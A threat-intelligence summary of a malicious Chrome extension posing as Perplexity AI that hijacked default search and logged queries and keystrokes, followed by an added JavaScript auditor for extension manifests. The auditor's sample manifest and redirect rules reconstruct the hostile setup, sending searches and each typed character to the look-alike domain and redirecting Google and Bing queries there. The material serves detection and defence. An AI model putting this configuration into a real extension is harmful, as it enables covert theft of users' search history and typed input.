Summary Points
- A malicious Chrome extension impersonating Perplexity AI set itself as the default search engine, logged every search query and every partial string typed into the address bar, and only then forwarded the user to a legitimate search engine so the theft went unnoticed.
- The extension abused Chrome's search-provider override (the `chrome_settings_overrides` manifest key), which lets an extension replace the default search URL and the suggestion URL; the suggestion URL receives each keystroke as it is typed, so input was captured in real time without any user-visible sign.
- The collected queries and keystrokes give an attacker a detailed profile of each victim that can be used for targeting or follow-on activity, which underlines the risk of installing unverified extensions that carry AI branding.
The Threat, Attack Techniques, and Targets
Microsoft identified a malicious Chrome extension named "Search for perplexity ai" that posed as a search front end for the Perplexity AI service and silently logged all search queries and address bar input. It used the look-alike domain perplexity-ai[.]online so that traffic to the attacker's server appeared to go to the real site. Once installed, the extension registered itself as the default search engine and routed every search through the attacker's server, which recorded the query and then redirected the user to genuine search results, so the user saw nothing unusual. Because the extension also supplied its own suggestion endpoint, the browser sent each partial string to the attacker as the user typed, so characters were captured before a search was ever submitted. The extension requested permissions to rewrite and redirect search traffic, which an extension that merely adds a search shortcut has no need for. It also shipped redirect rules for Bing and Google that were disabled at the time of analysis; enabling them would have captured searches on those engines as well. The goal was the covert collection of detailed search history and typed input from every user who installed the extension.
Impact, Security Implications, and Remediation Guidance
This extension poses a significant privacy risk: it collects detailed search history and keystrokes without consent. Although there is no evidence that passwords were stolen, the extension obtained far more access to user input than its stated purpose required, and the same position lets it manipulate search results and redirect traffic to attacker-controlled servers. The case underscores the value of reviewing what an extension asks for before installing it; a search-provider override or the ability to redirect traffic should be treated as a warning sign, and AI branding is no substitute for a verified publisher. If the extension is present, remove it immediately, then confirm in the browser's search engine settings that the default engine has not been changed and that no unexpected engine remains registered. Where an organisation manages browsers centrally, apply the vendor's guidance on blocking or allow-listing extensions so that a removed extension cannot be reinstalled.
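The mechanism described above and the permission check recommended here, as an added example that is not part of Microsoft's write-up or the extension's own code: a static audit of an unpacked extension's manifest.json and its declarativeNetRequest rule files. Only the extension name and the look-alike domain are taken from the write-up; the manifest layout, the rule contents and the allow-list of known search hosts are constructed assumptions made to resemble what the text describes.

```javascript
// Added example, not code from Microsoft or from the extension itself.
// Audits an unpacked Chrome extension for the two behaviours in the write-up:
// a search-provider override that sends queries and per-keystroke suggestion
// requests to a third-party host, and redirect rules aimed at search engines.

// Hosts a search-provider override may reasonably point at (assumed allow-list).
const KNOWN_SEARCH_HOSTS = new Set([
  "www.google.com", "www.bing.com", "duckduckgo.com", "www.perplexity.ai",
]);

// Hostname of a search template. "{searchTerms}" is the placeholder Chrome
// fills with the query (search_url) or with each partial string typed (suggest_url).
function hostOf(template) {
  try {
    return new URL(template.replace(/\{searchTerms\}/g, "x")).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// chrome_settings_overrides.search_provider is the manifest key that replaces the
// omnibox search: search_url receives submitted queries, suggest_url receives
// every keystroke, and is_default makes the override the default engine.
function auditSearchProvider(manifest) {
  const findings = [];
  const sp = manifest.chrome_settings_overrides?.search_provider;
  if (!sp) return findings;
  const checks = [["search_url", "query-exfil"], ["suggest_url", "keystroke-exfil"]];
  for (const [key, kind] of checks) {
    if (!sp[key]) continue;
    const host = hostOf(sp[key]);
    if (host === null || !KNOWN_SEARCH_HOSTS.has(host)) {
      findings.push({ kind, host, detail: sp[key] });
    }
  }
  if (sp.is_default) {
    findings.push({ kind: "sets-default-search", host: hostOf(sp.search_url ?? ""), detail: sp.name });
  }
  return findings;
}

// Redirect rules whose filter names a search engine are flagged whether or not
// their ruleset is enabled: a disabled static ruleset can be switched on later
// at runtime with chrome.declarativeNetRequest.updateEnabledRulesets.
function auditRedirectRules(manifest, ruleFiles) {
  const findings = [];
  const SEARCH_ENGINE = /google|bing|duckduckgo/i;
  for (const rs of manifest.declarative_net_request?.rule_resources ?? []) {
    for (const rule of ruleFiles[rs.path] ?? []) {
      if (rule.action?.type !== "redirect") continue;
      const filter = rule.condition?.regexFilter ?? rule.condition?.urlFilter ?? "";
      if (!SEARCH_ENGINE.test(filter)) continue;
      const target = rule.action.redirect?.url ?? rule.action.redirect?.regexSubstitution ?? "";
      findings.push({
        kind: "search-redirect-rule",
        ruleset: rs.id,
        enabled: rs.enabled !== false,
        host: hostOf(target),
        detail: filter,
      });
    }
  }
  return findings;
}

// Combined audit; ruleFiles maps the rule paths named in the manifest to their parsed contents.
function auditExtension(manifest, ruleFiles = {}) {
  return [...auditSearchProvider(manifest), ...auditRedirectRules(manifest, ruleFiles)];
}

// Constructed sample resembling the described extension (name and domain from the
// write-up; every other field is an assumption for the example).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Search for perplexity ai",
  permissions: ["declarativeNetRequest"],
  chrome_settings_overrides: {
    search_provider: {
      name: "Perplexity",
      keyword: "perplexity",
      search_url: "https://perplexity-ai.online/search?q={searchTerms}",
      suggest_url: "https://perplexity-ai.online/suggest?q={searchTerms}",
      encoding: "UTF-8",
      is_default: true,
    },
  },
  declarative_net_request: {
    rule_resources: [{ id: "redirects", enabled: false, path: "rules.json" }],
  },
};
const SAMPLE_RULES = {
  "rules.json": [
    { id: 1, priority: 1,
      action: { type: "redirect", redirect: { regexSubstitution: "https://perplexity-ai.online/search?q=\\1" } },
      condition: { regexFilter: "^https://www\\.google\\.com/search\\?q=([^&]*)", resourceTypes: ["main_frame"] } },
    { id: 2, priority: 1,
      action: { type: "redirect", redirect: { regexSubstitution: "https://perplexity-ai.online/search?q=\\1" } },
      condition: { regexFilter: "^https://www\\.bing\\.com/search\\?q=([^&]*)", resourceTypes: ["main_frame"] } },
  ],
};

for (const f of auditExtension(SAMPLE_MANIFEST, SAMPLE_RULES)) console.log(JSON.stringify(f));
```

Run against the sample, the audit reports the query and keystroke endpoints on perplexity-ai.online, the default-engine takeover, and both search-engine redirect rules marked as disabled. A benign extension that overrides search to a known engine produces only the default-engine finding, which is what a reviewer would expect to see and confirm deliberately.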
